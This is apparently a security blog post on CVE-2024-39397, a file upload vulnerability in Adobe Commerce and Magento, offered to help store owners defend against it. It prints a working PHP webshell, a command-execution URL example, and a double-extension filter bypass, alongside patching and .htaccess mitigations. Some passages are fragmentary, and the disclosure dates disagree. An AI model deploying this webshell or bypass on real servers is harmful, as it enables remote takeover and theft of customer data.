CVE CyberSecurity Database News

CVE-2024-39397 - Unrestricted File Upload in Adobe Commerce—What You Need to Know

Poster -

Adobe Commerce is a widely used e-commerce platform powering thousands of online stores. In June 2024, a critical vulnerability—CVE-2024-39397—was disclosed that affects multiple Adobe Commerce and Magento Open Source versions, specifically 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 and earlier. This bug can let an attacker upload dangerous files and execute malicious code on the server, leading to major data breaches or full compromise of your online store.

In this post, I'll walk you through how this vulnerability works, show you technical details with code snippets, and give you practical steps to protect your store before an attacker gets in.

What Is CVE-2024-39397?

CVE-2024-39397 is an Unrestricted Upload of File with Dangerous Type vulnerability. In plain English: the platform fails to properly check or restrict what type of files a user uploads—letting an attacker upload a script, executable, or other harmful file directly to your server.

Unlike lower-severity upload bugs, this flaw could let someone run code remotely on your server, which means they could control your website, steal data, or cause all sorts of havoc.

Magento Open Source variants of those versions

Always check the official advisory for the most up-to-date information.

Example: PHP Webshell Upload

Suppose the upload doesn't block .php files or allows files with double extensions like evil.php.jpg.

Here's a simple malicious PHP file

<?php
// webshell.php - Simple backdoor
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

The attacker uploads this file using the vulnerable upload point. After uploading it—let's say it's stored at:

https://victim-store.com/pub/media/tmp/webshell.php

Now, the attacker can execute commands

https://victim-store.com/pub/media/tmp/webshell.php?cmd=whoami

Result: The command runs on the store's server, outputting the current user.

Mitigation Evasion

Smart attackers might upload files with a double extension, like backdoor.php.jpg, to sneak past weak filters:

# Rename file locally before upload to backdoor.php.jpg
mv webshell.php backdoor.php.jpg

If the server only checks the last extension (.jpg), but actually allows PHP code to be interpreted, the file will run regardless.

Quick Reference: OWASP Unrestricted Upload Cheat Sheet

- Install the latest patched version from Adobe

- Adobe Commerce Security Updates

- Set upload directories outside the web root or block script execution with .htaccess

# .htaccess file in media/tmp/
RemoveHandler .php .phtml .php3 .php4 .php5 .php7 .phps
RemoveType .php .phtml .php3 .php4 .php5 .php7 .phps
php_flag engine off

- Adobe Security Bulletin APSB24-44 (CVE-2024-39397)
- NIST NVD Entry for CVE-2024-39397
- OWASP File Upload Security

Conclusion

CVE-2024-39397 is a dangerous and easily exploitable bug for skilled attackers. If you use any of the affected versions of Adobe Commerce or Magento, you should update immediately and review your file upload settings. File upload vulnerabilities are among the most serious in web security, so take action now—before someone else does.

Stay safe! If you want more practical security guides and long reads like this, let me know in the comments.

Timeline

Published on: 08/14/2024 12:15:24 UTC
Last modified on: 08/14/2024 14:46:52 UTC